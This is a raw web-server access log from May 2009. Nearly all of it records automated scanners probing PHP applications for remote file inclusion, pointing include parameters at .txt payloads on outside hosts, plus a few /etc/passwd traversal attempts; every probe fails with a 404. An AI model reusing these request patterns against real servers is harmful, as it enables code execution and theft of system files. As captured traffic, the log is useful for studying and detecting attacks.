122.116.178.20 - - [17/May/2009:00:17:51 -0500] "GET /logs/access_log.1239667200//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:17:54 -0500] "GET /logs/access_log.1238889600//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:17:55 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:17:55 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:17:55 -0500] "GET /logs/access_log.1237852800//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:00:19:06 -0500] "GET /logs/access_log.1239667200//e404.php?DOCUMENT_ROOT=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
80.90.20.125 - - [17/May/2009:00:19:51 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
80.90.20.125 - - [17/May/2009:00:19:51 -0500] "GET //components/com_flyspray/startdown.php?file=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.90.20.125 - - [17/May/2009:00:19:51 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
80.90.20.125 - - [17/May/2009:00:19:52 -0500] "GET //components/com_flyspray/startdown.php?file=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
58.227.193.198 - - [17/May/2009:00:21:36 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:21:36 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:21:36 -0500] "GET /logs/access_log.1230249600//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:21:36 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:27:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:27:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:27:39 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.231 - - [17/May/2009:00:28:29 -0500] "GET /_vti_cnf/ HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.227.193.198 - - [17/May/2009:00:28:30 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:28:31 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:28:32 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:28:32 -0500] "GET /logs/access_log.1233100800//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:28:32 -0500] "GET /logs/access_log.1238976000//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:28:37 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:28:38 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:00:28:38 -0500] "GET /logs/access_log.1233964800//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:00:28:43 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.221.130.2 - - [17/May/2009:00:28:43 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 306 "-""libwww-perl/5.805"
193.221.119.126 - - [17/May/2009:00:28:47 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.225.211.159 - - [17/May/2009:00:32:06 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:32:06 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.820"
85.214.86.93 - - [17/May/2009:00:32:07 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:32:07 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:32:07 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:32:09 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.164.18 - - [17/May/2009:00:32:29 -0500] "GET /logs//include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
74.52.164.18 - - [17/May/2009:00:32:31 -0500] "GET //include/admin.lib.inc.php?site_path=ftp://195.229.228.218/v6id.txt??%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
66.249.67.180 - - [17/May/2009:00:32:36 -0500] "GET /logs/access_log.1179100800 HTTP/1.1" 200 688 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.225.211.159 - - [17/May/2009:00:32:59 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:00:32:59 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.820"
69.90.72.88 - - [17/May/2009:00:35:06 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.90.72.88 - - [17/May/2009:00:35:06 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
69.90.72.88 - - [17/May/2009:00:35:11 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.90.72.88 - - [17/May/2009:00:35:11 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
65.55.106.204 - - [17/May/2009:00:35:29 -0500] "GET /logs/access_log.1189555200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.227.193.198 - - [17/May/2009:00:35:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:35:37 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:35:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:36:32 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.34.78.110 - - [17/May/2009:00:36:51 -0500] "GET //upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.34.78.110 - - [17/May/2009:00:36:51 -0500] "GET /logs/access_log.1239753600//upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.34.78.110 - - [17/May/2009:00:36:51 -0500] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:00:39:58 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:00:39:58 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:00:39:58 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:13 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:17 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:17 -0500] "GET /logs/access_log.1234310400//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:17 -0500] "GET /logs/access_log.1229904000//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [17/May/2009:00:41:17 -0500] "GET /logs/access_log.1240531200//upgrade_album.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:18 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:18 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:18 -0500] "GET /logs/access_log.1235865600//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:41:18 -0500] "GET /logs/access_log.1235347200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:42:42 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:42:42 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:42:42 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:42:49 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:42:49 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:42:49 -0500] "GET /logs/access_log.1236556800//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:42:50 -0500] "GET /logs/access_log.1236470400//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:42:51 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:43:50 -0500] "GET /logs/access_log.1235347200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:43:50 -0500] "GET /logs/access_log.1235779200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.239.76.25 - - [17/May/2009:00:48:24 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.239.76.25 - - [17/May/2009:00:48:24 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
222.239.76.25 - - [17/May/2009:00:48:24 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:50:45 -0500] "GET /logs/access_log.1235779200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:00:50:49 -0500] "GET //include/admin.lib.inc.php?site_path=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.235.45 - - [17/May/2009:00:52:44 -0500] "GET /logs/access_log.1235347200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:52:44 -0500] "GET /logs/access_log.1235260800//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:00:55:56 -0500] "GET /logs/access_log.1239926400//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:00:55:56 -0500] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:00:55:56 -0500] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:56:24 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:56:24 -0500] "GET /logs/access_log.1235347200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:56:24 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:56:25 -0500] "GET /logs/access_log.1235260800//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:40 -0500] "GET ///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:40 -0500] "GET /logs///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:40 -0500] "GET /logs/access_log.1240444800///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:43 -0500] "GET ///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:43 -0500] "GET /logs///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:43 -0500] "GET /logs/access_log.1240444800///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:43 -0500] "GET ///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:44 -0500] "GET /logs///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:00:57:44 -0500] "GET /logs/access_log.1240444800///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:59:17 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:59:17 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:00:59:17 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:59:20 -0500] "GET /logs/access_log.1233619200//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:59:20 -0500] "GET //e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:59:20 -0500] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:00:59:57 -0500] "GET /logs/access_log.1238889600//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:00:07 -0500] "GET /logs/access_log.1238889600//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.205 - - [17/May/2009:01:00:42 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.205 - - [17/May/2009:01:01:29 -0500] "GET /logs/access_log.1137456000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.205 - - [17/May/2009:01:01:29 -0500] "GET /logs/access_log.1160611200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.149.235.45 - - [17/May/2009:01:01:45 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:01:45 -0500] "GET /logs/access_log.1234310400//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:01:45 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:01:50 -0500] "GET /logs/access_log.1237939200///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:02:04 -0500] "GET /logs/access_log.1235779200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:02:05 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:02:05 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:02:05 -0500] "GET /logs/access_log.1234310400//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:02:18 -0500] "GET /logs/access_log.1235779200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:02:18 -0500] "GET /logs/access_log.1237939200///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:02:20 -0500] "GET /logs/access_log.1237939200///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:03:00 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:03:00 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:03:00 -0500] "GET /logs/access_log.1229904000//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:03:00 -0500] "GET /logs/access_log.1234310400//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:03:46 -0500] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:03:46 -0500] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:03:52 -0500] "GET /logs/access_log.1229904000//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:07:55 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:07:55 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:07:55 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:10:09 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:10:09 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:10:10 -0500] "GET /logs/access_log.1233187200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:10:10 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
196.40.83.75 - - [17/May/2009:01:10:29 -0500] "GET /logs/access_log.1235174400/components/com_simpleboard/image_upload.php?sbp=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
196.40.83.75 - - [17/May/2009:01:10:29 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
196.40.83.75 - - [17/May/2009:01:10:29 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
196.40.83.75 - - [17/May/2009:01:11:18 -0500] "GET /logs/access_log.1237852800/components/com_simpleboard/image_upload.php?sbp=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
